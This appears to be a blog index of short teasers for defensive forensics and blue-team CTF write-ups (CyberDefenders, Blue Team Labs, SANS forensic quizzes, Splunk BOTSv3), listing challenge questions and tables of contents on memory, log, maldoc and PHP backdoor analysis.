https://cyberdefenders.org/labs/66 Contents Introduction Tools Preparation Questions #1: What is the MD5 hash value of the suspect disk? #2: What phrase did the suspect search for on 2021-04-29 18:17:38 UTC? #3: What is the IPv4 address of the FTP server the suspect connected to? #4: What date and time was a password list deleted in UTC? #5: How many times was Tor Browser ran on the suspects computer?
https://blueteamlabs.online/home/challenge/1 Introduction Questions Run “vol.py -f infected.vmem –profile=Win7SP1x86 psscan” that will list all processes. What is the name of the suspicious process? What is the parent process ID for the suspicious process? What is the initial malicious executable that created this process? If you drill down on the suspicious PID (vol.py -f infected.vmem –profile=Win7SP1x86 psscan | grep (PIDhere)), find the process used to delete files Find the path where the malicious file was first executed Can you identify what ransomware it is?
Part of my role involves threat hunting on client servers. During one of these hunts I found a PHP backdoor called shell20210526.php. It was obfuscated - challenge accepted! There are a few PHP deobfuscation tools available. Individually they didn’t get the result, but in combination (along with some manual intervention) I was able to get a good result. Table of Contents Tools The .php Stage 1: UnPHP Stage 2: Manual Editing Stage 3: Run the Function Stage 4: PHP Deobfuscator Base64 Variables HTML Front-end Investigation Comments Tools UnPHP - The Online PHP Decoder
Update The answers have been released and are available here: https://isc.sans.edu/forums/diary/June+2021+Forensic+Contest+Answers+and+Analysis/27582/ They said it was hard, and it was. I’m proud of what I found! Reflecting back: For some reason, I thought they meant not all the machines are infected. It turns out all three were! So I skipped over .93 entirely. Similarly, I was thinking each infected machine only had one piece of malware. Wrong again! Because I was looking for the answers and not thinking as if it was a real investigation, I stopped looking too early.
https://blueteamlabs.online/home/challenge/10 What is the email service used by the malicious actor? What is the Reply-To email address? What is the filetype of the received attachment which helped to continue the investigation What is the name of the malicious actor? What is the location of the attacker in this Universe? What could be the probable C2 domain to control the attacker’s autonomous bots? What is the email service used by the malicious actor?
https://cyberdefenders.org/labs/42 Contents Initial Analysis Initial Findings Manipulating the Logs auth.log - sorted by command then time auth.log - all unique lines sorted by command (excluding timestamp) auth.log - extract commands auth.log - extract IPs www-access.log - extract IPs www-access.log - extract user agents Questions #1 Which service did the attackers use to gain access to the system? #2 What is the operating system version of the targeted system?
https://blueteamlabs.online/home/challenge/7 Open the file Decode the file Deobfuscating the script Spacing Fillers Chars Variables Format Strings Replaces Splits Questions What security protocol is being used for the communication with a malicious domain? What directory does the obfuscated PowerShell create? (Starting from \HOME) What file is being downloaded (full name)? What is used to execute the downloaded file? What is the domain name of the URI ending in ‘/6F2gd/’ Based on the analysis of the obfuscated code, what is the name of the malware?
https://cyberdefenders.org/labs/51 Contents Tools Used 1. Multiple streams contain macros in this document. Provide the number of highest one. 2. What event is used to begin the execution of the macros? 3. What malware family was this maldoc attempting to drop? 4. What stream is responsible for the storage of the base64-encoded string? 5. This document contains a user-form. Provide the name? 6. This document contains an obfuscated base64 encoded string; what value is used to pad (or obfuscate) this string?
https://isc.sans.edu/forums/diary/April+2021+Forensic+Quiz/27266/ Introduction Artifacts Excel-related Executables and DLLs Scheduled Task Pcaps Export objects Traffic Summary SHAs Introduction We’re provided with a .pcap and a bunch of artifacts (files). The AD, we’re told, is as follows: LAN segment range: 192.168.5.0/24 (192.168.5.0 through 192.168.5.255) Domain: clockwater.net Domain Controller: 192.168.5.5 - Clockwater-DC LAN segment gateway: 192.168.5.1 LAN segment broadcast address: 192.168.5.255 Artifacts First, let’s inspect the artifacts.
Splunk have several “Boss of the SOC” datasets, simulating a security incident - think of it as a Blue Team/SIEM-based CTF. This is my write-up for BOTSv3, at the time of writing the most recent dataset available. It seems that Taedonggang, a North Korean group, have attacked Frothly, a beer maker… The official BOTSv3 page is here: https://github.com/splunk/botsv3 I wrote this on Notion, and it is best viewed there, as it is always up-to-date and is visually best.